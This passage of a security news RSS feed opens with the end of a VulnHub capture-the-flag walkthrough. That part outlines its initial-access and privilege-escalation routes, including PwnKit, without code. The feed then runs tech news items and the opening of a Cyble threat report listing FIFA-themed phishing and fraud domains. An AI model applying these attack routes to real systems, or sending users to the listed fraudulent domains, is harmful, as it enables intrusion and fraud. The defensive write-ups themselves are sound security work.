combination:</strong> Neither the writable SMB share nor the cron job is catastrophic in isolation. Together they form a trivially exploitable initial access path — no credentials, no CVE, no brute force required. This is a textbook example of how misconfigured services compound each other.</p><p><strong>Four paths, one machine:</strong> Finding four independent privilege escalation routes on a single system underscores an important principle: each vulnerability does not need to be critical on its own. Sudo misconfiguration, a SUID shell binary, a world-writable cron script, and an unpatched kernel component all coexisted here. Defence-in-depth means fixing all of them, not just the most obvious one.</p><p><strong>GLIBC compatibility matters:</strong> The first PwnKit attempt failed due to a version mismatch between the compiled exploit binary and the target’s C library. When a kernel/userspace exploit fails silently, always check the GLIBC version (ldd --version) and match the pre-compiled exploit accordingly before assuming the system is not vulnerable.</p><p><em>Shikhali Jamalzade — alisalive.exe — instagram<br></em> <em>GitHub: </em><a href="https://github.com/alisalive"><em>github.com/alisalive</em></a><em> · LinkedIn: </em><a href="https://linkedin.com/in/camalzads"><em>linkedin.com/in/camalzads</em></a></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=db12d38d2e3b" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/vulnhub-sunset-dawn-full-walkthrough-db12d38d2e3b">VulnHub — sunset: dawn | Full Walkthrough</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Cloud boosts for enterprise agentic at London Summit]]></title>
<description><![CDATA[Hyperscaler prioritises process automation in UK showcase, with frontier models, agent platforms and development tools to the fore, with customers such as Unilever in the spotlight]]></description>
<link>https://tsecurity.de/de/3609960/it-nachrichten/google-cloud-boosts-for-enterprise-agentic-at-london-summit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609960/it-nachrichten/google-cloud-boosts-for-enterprise-agentic-at-london-summit/</guid>
<pubDate>Fri, 19 Jun 2026 12:02:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Hyperscaler prioritises process automation in UK showcase, with frontier models, agent platforms and development tools to the fore, with customers such as Unilever in the spotlight]]></content:encoded>
</item>
<item>
<title><![CDATA[Top announcements of the AWS Summit in New York, 2026]]></title>
<description><![CDATA[A recap of the top announcements from AWS's New York Summit 2026]]></description>
<link>https://tsecurity.de/de/3608938/ai-nachrichten/top-announcements-of-the-aws-summit-in-new-york-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608938/ai-nachrichten/top-announcements-of-the-aws-summit-in-new-york-2026/</guid>
<pubDate>Thu, 18 Jun 2026 23:03:42 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A recap of the top announcements from AWS's New York Summit 2026]]></content:encoded>
</item>
<item>
<title><![CDATA[I heard the awesome new JBL Summit Everest speakers, and these beasts felt like they could 'rumble me right out of my seat']]></title>
<description><![CDATA[The new enormous flagship speakers are some of the most powerful I’ve ever heard — and some of the largest and most expensive.]]></description>
<link>https://tsecurity.de/de/3608558/it-nachrichten/i-heard-the-awesome-new-jbl-summit-everest-speakers-and-these-beasts-felt-like-they-could-rumble-me-right-out-of-my-seat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608558/it-nachrichten/i-heard-the-awesome-new-jbl-summit-everest-speakers-and-these-beasts-felt-like-they-could-rumble-me-right-out-of-my-seat/</guid>
<pubDate>Thu, 18 Jun 2026 19:32:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The new enormous flagship speakers are some of the most powerful I’ve ever heard — and some of the largest and most expensive.]]></content:encoded>
</item>
<item>
<title><![CDATA[3 takeaways on Software Ecology™️]]></title>
<description><![CDATA[Author: Google for Developers - Bewertung: 14x - Views:130 What does easy, AI code generation mean for the future of our software systems? Let's find out. 

Subscribe to Google for Developers → https://goo.gle/developers 

#GoogleDeveloperNews

Speaker: Adam Bender 
Products Mentioned: Google AI]]></description>
<link>https://tsecurity.de/de/3608383/videos/3-takeaways-on-software-ecology/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608383/videos/3-takeaways-on-software-ecology/</guid>
<pubDate>Thu, 18 Jun 2026 18:18:10 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Google for Developers - Bewertung: 14x - Views:130 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/bjd98N1-Hwc?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>What does easy, AI code generation mean for the future of our software systems? Let's find out. <br />
<br />
Subscribe to Google for Developers → https://goo.gle/developers <br />
<br />
#GoogleDeveloperNews<br />
<br />
Speaker: Adam Bender <br />
Products Mentioned: Google AI<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Convoy co-founder Dan Lewis exits Microsoft to launch stealth startup aiming to reinvent AI supply chain]]></title>
<description><![CDATA[Dan Lewis, who led the Seattle freight marketplace Convoy before it shut down in 2023, has left Microsoft to start a stealth company focused on running AI models more efficiently, extending a career spent at the intersection of AI and logistics. Read More]]></description>
<link>https://tsecurity.de/de/3608331/it-nachrichten/convoy-co-founder-dan-lewis-exits-microsoft-to-launch-stealth-startup-aiming-to-reinvent-ai-supply-chain/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608331/it-nachrichten/convoy-co-founder-dan-lewis-exits-microsoft-to-launch-stealth-startup-aiming-to-reinvent-ai-supply-chain/</guid>
<pubDate>Thu, 18 Jun 2026 18:05:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1260" height="840" src="https://cdn.geekwire.com/wp-content/uploads/2019/10/2663-Summit-20191008-DD-1260x840.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" decoding="async" srcset="https://cdn.geekwire.com/wp-content/uploads/2019/10/2663-Summit-20191008-DD-1260x840.jpg 1260w, https://cdn.geekwire.com/wp-content/uploads/2019/10/2663-Summit-20191008-DD-768x512.jpg 768w, https://cdn.geekwire.com/wp-content/uploads/2019/10/2663-Summit-20191008-DD-630x420.jpg 630w, https://cdn.geekwire.com/wp-content/uploads/2019/10/2663-Summit-20191008-DD.jpg 2048w" sizes="(max-width: 1260px) 100vw, 1260px"><br>Dan Lewis, who led the Seattle freight marketplace Convoy before it shut down in 2023, has left Microsoft to start a stealth company focused on running AI models more efficiently, extending a career spent at the intersection of AI and logistics. <a href="https://www.geekwire.com/2026/convoy-co-founder-dan-lewis-exits-microsoft-to-launch-stealth-startup-aiming-to-reinvent-ai-supply-chain/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why Security Teams Need To Start Earlier]]></title>
<description><![CDATA[Security leaders are facing an unusual set of circumstances. The drumbeat for better security prioritization has been rising for years in boardrooms around the world. The desire is there, but the processes of the past aren’t meeting the needs of the new moment we find ourselves in. That gap is no...]]></description>
<link>https://tsecurity.de/de/3608255/it-security-nachrichten/why-security-teams-need-to-start-earlier/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608255/it-security-nachrichten/why-security-teams-need-to-start-earlier/</guid>
<pubDate>Thu, 18 Jun 2026 17:26:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>Security leaders are facing an unusual set of circumstances. The drumbeat for better security prioritization has been rising for years in boardrooms around the world. The desire is there, but the processes of the past aren’t meeting the needs of the new moment we find ourselves in. </span></p><p><span>That gap is not a technology problem. It's an operating model problem.</span></p><p><span>At the opening keynote of </span><a href="https://rapid7.brighttalk.com/?utm_source=blog&amp;utm_medium=website&amp;utm_content=executive-pov&amp;utm_campaign=global-pla-2026-global-virtual-summit-prospect-eng" target="_blank"><span>Rapid7’s 2026 Global Cybersecurity Summit,</span></a><span> Craig Adams, Chief Product Officer, Rapid7, Brian Castagna, CSO, Rapid7 and IDC’s Research VP, Craig Robinson framed a simple idea: cyber defense needs to start earlier.</span></p><p><span>For more on this, download our new ebook, </span><a href="https://www.rapid7.com/lp/preemptive-security-from-resilience-to-action/?utm_source=blog&amp;utm_medium=website&amp;utm_content=post-summit-executive-pov&amp;utm_campaign=global-mdr-2026-global-virtual-summit-prospect-eng-nom-25" target="_self"><span>Preemptive Security: From Resilience to Action</span></a><span>.</span></p><h2>Complexity is outpacing control</h2><p><span>Security environments have never been more connected or more difficult to manage. Cloud adoption, SaaS sprawl, third-party dependencies, and identity growth have expanded the attack surface in ways most programs were not designed to handle. Many teams have responded by adding more tools and more telemetry. This has resulted in more fragmentation, more dashboards, and more opportunities for important information to slip through the cracks. </span></p><p><span>Teams are spending more time stitching context together than they are effectively reducing risk. This shows up in daily operations with analysts moving between multiple systems to validate alerts, and leaders lacking the clear picture to explain risk to the business. In a time when exposure management and detection &amp; response can live on one platform, that level of fragmentation makes no sense.</span></p><h2>Reactive security creates operational drag</h2><p><span>The traditional model still dominates most security programs. It goes like this (stop us if you’ve heard this before): 1) Detect an alert. 2) Investigate. 3) Contain. 4) Recover. 5) Repeat, forever. </span></p><p><span>Sounds simple, right? And it worked great when environments were simpler and attackers moved slower. That is no longer the case.</span></p><p><span>Today, initial access often happens quietly through identity abuse or misconfiguration. Attack paths form before an alert even fires. By the time a signal reaches the security team, attackers may already be moving laterally or accessing sensitive systems. This creates a cycle of constant response without consistent risk reduction. Teams get better at handling incidents but struggle to remove the conditions that enable them.</span></p><p><span>Security operations centers can receive thousands of alerts per day, many of which are low value or false positives. This leaves analysts spending hours triaging signals instead of focusing on the exposures most likely to lead to impact.</span></p><p><span>More alerts do not make you safer. They create drag. Better context creates better outcomes. </span></p><h2>The issue is prioritization, not visibility</h2><p><span>Most organizations are not lacking data. They are lacking the clarity needed to understand the data they have and contextualize it as it relates to their business. Telemetry alone does not answer the question that matters most: what should we do first?</span></p><p><span>Attackers look for the most effective path into an environment, often combining smaller weaknesses across assets, identities, and systems until they create meaningful access. Security teams need a similarly connected view, one that helps them understand which exposures are exploitable, which assets are most critical, and how those risks relate across the environment. When teams can see that full picture, they can focus remediation on the issues most likely to be used in a real attack, making risk reduction more targeted, efficient, and defensible. </span></p><p><span>The result is effort without impact.</span></p><h2>Why security needs to start earlier</h2><p><span>The </span><a href="https://rapid7.brighttalk.com/talk/10457-663128/?utm_source=blog&amp;utm_medium=website&amp;utm_content=executive-pov&amp;utm_campaign=global-pla-2026-global-virtual-summit-prospect-eng" target="_blank"><span>summit’s keynote</span></a><span> message is direct: meaningful action must move earlier in the lifecycle.</span></p><p><span>Preemptive Security introduces an operating model designed for that shift. It connects four core elements:</span></p><ul><li><p><span>Exposure management to identify and prioritize risk</span></p></li><li><p><span>Managed detection and response (MDR) to monitor and act</span></p></li><li><p><span>Artificial intelligence to reduce noise and accelerate analysis</span></p></li><li><p><span>Human expertise to validate and decide</span></p></li></ul><p><span>Together, these capabilities create a system that acts before risk becomes impact. Instead of waiting for alerts, teams identify likely breach paths. Instead of reacting to incidents, they reduce exposure ahead of time. Instead of managing disconnected tools, they operate with shared context and clear priorities. Detection and response becomes one leg of the stool with exposure management taking the lead in reducing risk before it becomes an emergency. </span></p><h2>What changes for security leaders</h2><p><span>For CISOs and security leaders, this shift means designing programs around likely attack paths, not isolated findings. It means prioritizing investments based on risk reduction, not tool coverage and enabling teams to act decisively without increasing headcount or complexity.</span></p><p><span>It also changes how success is measured. The goal is fewer surprises, faster containment and reduced exposure before exploitation. It means starting earlier, to increase the likelihood of success. These are outcomes the business understands.</span></p><h2>A new starting point for security</h2><p><span>Ultimately, the environment has changed faster than the operating model. So the operating model needs to change. Luckily, there’s a proven path forward that can prevent the attacks from bad actors already moving in earlier, using technology to scale their operations, and exploiting small weaknesses to get a foothold. </span></p><p><span>Preemptive Security provides the framework to close that gap. It helps teams reduce noise, focus on what matters, and act with confidence before disruption occurs. Security does not start with an alert. It starts with understanding risk early enough to do something about it.</span></p><p><a href="https://rapid7.brighttalk.com/talk/10457-663128/?utm_source=blog&amp;utm_medium=website&amp;utm_content=executive-pov&amp;utm_campaign=global-pla-2026-global-virtual-summit-prospect-eng" target="_blank"><span>Watch the keynote on demand </span></a><span>or </span>download the eBook,<span> </span><a href="https://www.rapid7.com/lp/preemptive-security-from-resilience-to-action/?utm_source=blog&amp;utm_medium=website&amp;utm_content=post-summit-executive-pov&amp;utm_campaign=global-mdr-2026-global-virtual-summit-prospect-eng-nom-25" target="_self"><span>Preemptive Security: From Resilience to Action</span></a><span>, to explore the model in more detail.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Single-hop block replication with RMR and BRMR]]></title>
<description><![CDATA[How can cloud providers efficiently supply durable virtual block devices? Remote
Direct Memory Access (RDMA) provides a way for servers in a cluster to share
chunks of memory, but there still needs to be a protocol that operates on top of
RDMA to provide the guarantees expected of a block device....]]></description>
<link>https://tsecurity.de/de/3607966/linux-tipps/single-hop-block-replication-with-rmr-and-brmr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607966/linux-tipps/single-hop-block-replication-with-rmr-and-brmr/</guid>
<pubDate>Thu, 18 Jun 2026 15:39:23 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>
How can cloud providers efficiently supply durable virtual block devices? Remote
Direct Memory Access (RDMA) provides a way for servers in a cluster to share
chunks of memory, but there still needs to be a protocol that operates on top of
RDMA to provide the guarantees expected of a block device. The kernel's RDMA transport
library (RTRS) provides a way to send messages via RDMA. I
<a href="https://lwn.net/images/2026/RMR_BRMR.pdf">presented</a> about two
new components built on top of RTRS at the 2026
<a href="https://events.linuxfoundation.org/lsfmmbpf/">Linux
Storage, Filesystem, Memory Management and BPF Summit</a>: Reliable Multicast
over RTRS (RMR) and Block device over RMR (BRMR). These modules, which I
am working on with Jia Li, could be a way for cloud providers to
expose durable block devices with as little overhead as possible. To accomplish
that, however, we need some discussion and feedback from the community before
sending the modules upstream.
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Databricks targets AI operations bottlenecks with ZeroOps]]></title>
<description><![CDATA[Databricks is pitching a fix for what it sees as the growing operations mess in enterprise AI. With the launch of Genie ZeroOps, unveiled at its Data + AI Summit, the company is targeting a problem many data teams know too well: it’s no longer building pipelines and models that hurts, it’s keepin...]]></description>
<link>https://tsecurity.de/de/3607707/ai-nachrichten/databricks-targets-ai-operations-bottlenecks-with-zeroops/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607707/ai-nachrichten/databricks-targets-ai-operations-bottlenecks-with-zeroops/</guid>
<pubDate>Thu, 18 Jun 2026 14:18:57 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Databricks is pitching a fix for what it sees as the growing operations mess in enterprise AI. With the launch of Genie ZeroOps, unveiled at its Data + AI Summit, the company is targeting a problem many data teams know too well: it’s no longer building pipelines and models that hurts, it’s keeping them running.</p>



<p>As data estates sprawl and AI workloads multiply, engineering time is increasingly eaten up by maintenance. Meanwhile, AI coding tools are accelerating development, churning out even more assets that need oversight, widening the gap between how fast teams can build and how much they have to manage.</p>



<p>Databricks Genie ZeroOps is a new agentic operations capability that is designed to automate the monitoring, investigation, and remediation of issues across data and AI workloads.</p>



<p>Currently in private preview, ZeroOps uses an AI agent to identify anomalies, trace root causes using metadata and lineage information via Unity Catalog, generate proposed fixes, and then test those fixes in an isolated environment before pushing them out for human review to be applied in production.</p>



<h2 class="wp-block-heading">Targeting real operational complexity?</h2>



<p>Genie ZeroOps addresses a legitimate enterprise challenge around operational complexity, particularly the growing burden of maintaining data and AI workloads in production, analysts say.</p>



<p>“Most data teams spend more time keeping pipelines and models alive than building new ones,” said <a href="http://linkedin.com/in/amitchandak78?originalSubdomain=in" target="_blank" rel="noreferrer noopener">Amit Chandak</a>, chief analytics officer at IT consulting firm Kanerika.</p>



<p>Echoing Chandak, independent consultant <a href="https://davidlinthicum.com/" target="_blank" rel="noreferrer noopener">David Linthicum</a> said enterprises continue to grapple with deployment drift, incident response, compliance checks, and root-cause analysis across increasingly fragmented data and AI estates.</p>



<p>Those challenges, echoed <a href="https://www.linkedin.com/in/victor-coimbra-999a02a0/" target="_blank" rel="noreferrer noopener">Victor Coimbra</a>, CTO of IT consulting firm Artefact, are compounded by the emergence of agentic coding tools that accelerate the development of assets, such as machine learning pipelines and models that need “babysitting.”</p>



<p>That maintenance burden carries a significant productivity cost, said <a href="https://www.linkedin.com/in/robert-kramer-58239b22/" target="_blank" rel="noreferrer noopener">Robert Kramer</a>, managing partner at KramerERP, noting that activities such as managing infrastructure, deployment environments, support processes, and operational workflows consume time without directly creating business value.</p>



<p>Those productivity drains, according to Coimbra, have proven difficult to eliminate despite the emergence and widespread adoption of automated observability and governance tools.</p>



<p>“What is different here is the agentic piece. Databricks is trying to move from tools that alert humans to systems that diagnose issues, propose fixes, and validate them in a governed environment without breaking anything in production,” echoed <a href="https://www.linkedin.com/in/slwalter/">Stephanie Walter</a>, practice leader of AI stack at HyperFRAME Research.</p>



<h2 class="wp-block-heading">Shifting the role of platform teams</h2>



<p>That shift, according to analysts, could change the way most enterprise platforms and development teams work currently.</p>



<p>“Skilled engineers spend the majority of their time on toil. If the ZeroOps agent, in the background, handles monitoring, investigation, and fix-proposal, engineers shift from doing the operational work to reviewing it. The traditional split between ‘people who build’ and ‘people who keep things running’ starts to blur,” said <a href="https://www.hfsresearch.com/team/ashish-chaturvedi/" target="_blank" rel="noreferrer noopener">Ashish Chaturvedi</a>, leader of executive research at HFS Research.</p>



<p>“Additionally, this would also mean that platform teams (engineers responsible for maintenance) can focus on genuinely novel failures rather than the repetitive ones,” Chaturvedi added.</p>



<p>The shift, according to Coimbra, could also affect how enterprises scale platform teams: “They can stop hiring operations staff in lockstep with every new pipeline. The same team can cover a lot more.”</p>



<p>Given that the capability is still in preview, Kanerika’s Chandak pointed out that the headcount reduction claims may be overstated.</p>



<p>ZeroOps could instead pose the risk of “skill atrophy,” Chandak said. </p>



<p>“If engineers stop debugging because the agent does it, the team’s ability to handle the cases the agent cannot handle becomes a real exposure,” Coimbra added.</p>



<h2 class="wp-block-heading">What ZeroOps could mean for CIOs</h2>



<p>Genie ZeroOps could be attractive to CIOs because it links innovation capacity with operational discipline rather than forcing a tradeoff between the two, Linthicum said.</p>



<p>“The appeal is straightforward: reduce operational drag, shorten deployment cycles, improve service resilience, and enforce governance without scaling headcount at the same rate as workloads,” Linthicum said.</p>



<p>That combination of efficiency and reliability could help CIOs rein in one of the biggest costs associated with operating data and AI environments, Chaturvedi said. “ZeroOps attacks time spent on maintenance. CIOs have watched their data engineering budgets balloon while the proportion of that spend going to net-new value shrinks.”</p>



<p>Linthicum warned that CIOs should consider the new offering with calculated skepticism and seek metrics to validate Databricks’ claims.</p>



<p>“The headline metrics are mean time to detect and mean time to resolve, plus the share of incidents the agent closes without a human stepping in. Those tell you whether it is actually removing the operational complexities that it promises,” Kanerika’s Chandak echoed.</p>



<p>“Underneath these metrics, CIOs should track the accuracy of their root cause calls, the false positive rate on proposed fixes, and the proportion of fixes engineers approve without editing, because that last number is the real trust signal. On cost, they should measure cost per incident handled against the human baseline, net of agent compute,” Chandak added.</p>



<p>That scrutiny, Chandak further added, is even more important for CIOs because Databricks is entering an emerging category.</p>



<p>“Most vendor agent announcements target the build and use layers, helping people write code or ask questions of their data. ZeroOps targets the operate layer, which is less crowded,” Chandak said.</p>



<p>ENDS</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Operation FanTrap: Inside the FIFA 2026 Fraud Ecosystem]]></title>
<description><![CDATA[Executive Summary 


The FIFA World Cup 2026 has become more than a global sporting event. It has evolved into a large-scale cybercrime opportunity exploited by threat actors through a coordinated ecosystem of fraudulent domains, social media channels, messaging platforms, pirated streaming servi...]]></description>
<link>https://tsecurity.de/de/3607507/it-security-nachrichten/operation-fantrap-inside-the-fifa-2026-fraud-ecosystem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607507/it-security-nachrichten/operation-fantrap-inside-the-fifa-2026-fraud-ecosystem/</guid>
<pubDate>Thu, 18 Jun 2026 13:17:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1200" height="600" src="https://cyble.com/wp-content/uploads/2026/06/FIFA-2026-Fraud.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="FIFA 2026 Fraud" decoding="async" srcset="https://cyble.com/wp-content/uploads/2026/06/FIFA-2026-Fraud.webp 1200w, https://cyble.com/wp-content/uploads/2026/06/FIFA-2026-Fraud-300x150.webp 300w, https://cyble.com/wp-content/uploads/2026/06/FIFA-2026-Fraud-1024x512.webp 1024w, https://cyble.com/wp-content/uploads/2026/06/FIFA-2026-Fraud-768x384.webp 768w" sizes="(max-width: 1200px) 100vw, 1200px" title="Operation FanTrap: Inside the FIFA 2026 Fraud Ecosystem 1"></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Executive Summary </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>The FIFA World Cup 2026 has become more than a global sporting event. It has evolved into a large-scale cybercrime opportunity exploited by threat actors through a coordinated ecosystem of fraudulent domains, social media channels, messaging platforms, pirated streaming services, and dark web activity. Since May 2026, Cyble Research and Intelligence Labs (CRIL) has identified nearly 4,000 domains impersonating FIFA-related brands, ticketing platforms, streaming services, and fan-facing resources. <br> <br>Operation FanTrap reveals how threat actors are building end-to-end fraud operations designed to attract, engage, and monetize football fans worldwide. Victims are lured through fake ticket offers, VIP access schemes, counterfeit hospitality portals, and unauthorized streaming platforms. Evidence also shows victims being redirected to private communication channels such as Telegram and WhatsApp, where payment fraud, credential theft, and identity harvesting occur. <br> <br>CRIL’s investigation also identified growing dark web activity linked to the tournament, including claims of football-sector identity data leaks and discussions around ticket resale opportunities. While the authenticity of some leak claims remains under investigation, their circulation highlights the increasing convergence of fan-targeted fraud, identity theft, and cyber-enabled financial crime. <br> <br>The campaign demonstrates how major international events create a scalable environment for cybercriminal operations. Through multilingual targeting, extensive infrastructure deployment, and diversified monetization strategies, threat actors are transforming global sporting events into sustained cybercrime ecosystems. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Key Takeaways </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Operation FanTrap is a coordinated investigation into the broader fraud ecosystem exploiting global interest in FIFA events </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Nearly 4,000 FIFA-themed domains were identified supporting phishing, ticket fraud, VIP scams, streaming lures, and brand impersonation. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>The websites used a multilingual infrastructure to maximize victim reach, with a particularly strong focus on Chinese-speaking audiences. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Telegram and WhatsApp function as transaction layers where victims are moved from public-facing infrastructure into private fraud workflows. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Pirated streaming platforms serve as credential theft and payment fraud funnels rather than simple copyright violations. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Dark web discussions and alleged football-sector identity leaks create opportunities for targeted social engineering and secondary monetization. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Campaign overview </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td>Parameter </td>
<td>Observed Value </td>
</tr>
<tr>
<td>Campaign Codename (CRIL) </td>
<td>Operation FanTrap </td>
</tr>
<tr>
<td>Monitoring Window </td>
<td>May 2026 – June 2026 (ongoing) </td>
</tr>
<tr>
<td>Dominant Fraud Categories </td>
<td>Ticket scam, VIP access fraud, pirate streaming, phishing </td>
</tr>
<tr>
<td>Primary Target Demography </td>
<td>Chinese-speaking fans, Korean fans, Latin American fans </td>
</tr>
<tr>
<td>Dark Web Activity </td>
<td>Forum-based ticket resale fraud; identity data leak claims </td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p><!-- wp:paragraph --></p>
<p>The FIFA World Cup 2026 will span the US, Canada, and Mexico, with a 48-team format and global broadcast reach. CRIL's monitoring uncovered significant spikes in <a href="https://cyble.com/blog/fifa-world-cup-2026-scams/">malicious domain registrations</a> mapped to specific attack themes, demonstrating how threat actors rapidly adapted their infrastructure to capitalize on tournament-related interest. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":120992,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/Operation-FanTrap-attack-themes-1024x227.png" alt="" class="wp-image-120992"><figcaption class="wp-element-caption"><em>Figure 1 - Operation FanTrap attack themes</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Anatomy of the FIFA 2026 Fraud Ecosystem </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading">Domain Patterns - The Fraud Ecosystem </h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Threat actors leveraged ticketing, VIP access, official branding, and live streaming to broaden their victim pool. Examples of these domain patterns are shown in the table below. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td>Domain Pattern </td>
<td>Example Domains </td>
<td>Count </td>
<td>Fraud Category </td>
</tr>
<tr>
<td>zh-[term]-fifa.com </td>
<td>zh-worldcuphub-fifa.com, zh-nowlive-fifa.com </td>
<td>541 </td>
<td>Chinese-language phishing/streaming </td>
</tr>
<tr>
<td>cn-[term]-fifa.com </td>
<td>cn-vpn-fifa.com, cn-setting-fifa.com </td>
<td>372 </td>
<td>Chinese-language credential/VPN phishing </td>
</tr>
<tr>
<td>[term]-worldcup-fifa.com </td>
<td>play-worldcup-fifa.com, vip-worldcup-fifa.com </td>
<td>413 </td>
<td>Brand impersonation </td>
</tr>
<tr>
<td>[term]-wc-fifa.com </td>
<td>cctv-maiqiu-fifa-wc.com, ssl-cn-fifa-wc.com </td>
<td>391 </td>
<td>Ticketing/streaming fraud </td>
</tr>
<tr>
<td>fifa-ticket-[term].com </td>
<td>fifa-ticket-26.com, fifa-freetickets.*.top </td>
<td>10+ </td>
<td>Ticket scam </td>
</tr>
<tr>
<td>fifa-vip-[term].com </td>
<td>fifa-vip-huya.com, fifa-vip-wcplay.com </td>
<td>84 </td>
<td>VIP/premium access fraud </td>
</tr>
<tr>
<td>official-[term]-fifa.com </td>
<td>official-live-fifa.com, official-2026-fifa.com </td>
<td>87 </td>
<td>Brand authority impersonation </td>
</tr>
<tr>
<td>live-[term]-fifa.com </td>
<td>vip-live-fifa.com, web-live-fifa.com </td>
<td>219 </td>
<td>Pirate streaming </td>
</tr>
<tr>
<td>maiqiu variants </td>
<td>chn-maiqiu-fifa-worldcup.com, cctv-maiqiu-fifa.com </td>
<td>51 </td>
<td>Chinese ticket-buying fraud </td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p><!-- wp:image {"id":120993,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/Fraudulent-FIFA-2026-Official-Hospitality-Ticketing-Portal-1024x768.png" alt="" class="wp-image-120993"><figcaption class="wp-element-caption"><em>Figure 2 - Fraudulent FIFA 2026 Official Hospitality Ticketing Portal</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>The extensive use of <strong>zh-</strong>, <strong>cn-</strong>, and Chinese-language World Cup labels such as <em>shijiebei</em>, <em>pankou</em>, and <em>maiqiu</em> highlights a deliberate focus on Mandarin-speaking audiences. This targeting extends beyond traditional ticket fraud to encompass betting platforms, media-themed credential theft, piracy lures, prize scams, and counterfeit merchandise. This signals a persistent and organized fraud ecosystem designed to capitalize on China's large football fanbase and strong demand for World Cup-related content and services. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Dark Web Intelligence </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>We also identified a growing ecosystem of ticket resale fraud on Telegram and WhatsApp, as well as pirated streaming lures. Both are actively used to monetize fan interest and facilitate fraud, credential harvesting, and other malicious activity. </p>
<p><!-- /wp:paragraph --></p>
